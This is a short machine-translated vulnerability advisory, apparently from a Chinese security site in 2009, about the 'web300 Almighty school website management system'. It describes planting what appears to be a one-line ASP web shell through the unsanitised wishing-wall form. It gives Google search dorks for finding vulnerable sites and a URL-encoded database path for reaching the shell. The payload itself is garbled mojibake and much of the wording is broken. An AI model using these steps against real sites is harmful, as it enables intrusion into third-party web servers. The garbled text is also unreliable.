web300 Almighty school web site management system database plug horse vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200925445
Type myhack58
Reporter 佚名
Modified 2009-11-29T00:00:00


Publishing author: San ㄗ Feng 訫 lock love

Affect the system: web300 Almighty school website management system

Vulnerability description:

web300 Almighty school website management system on the wishing wall in the database unprocessed, can be inserted into a word.

Vulnerability test:

Google:inurl:plus_dg. asp or inurl:downdown. asp

Jump to the/xy/wish. asp page, Click I want to make a wish in the wishing content is inserted at the word ┼pay offs number 畣 whole 爠 Hwan enemy 瑳∨≡┩anger, connect to the database address: xy/web300%2 5% 2 3% 4 0. asp.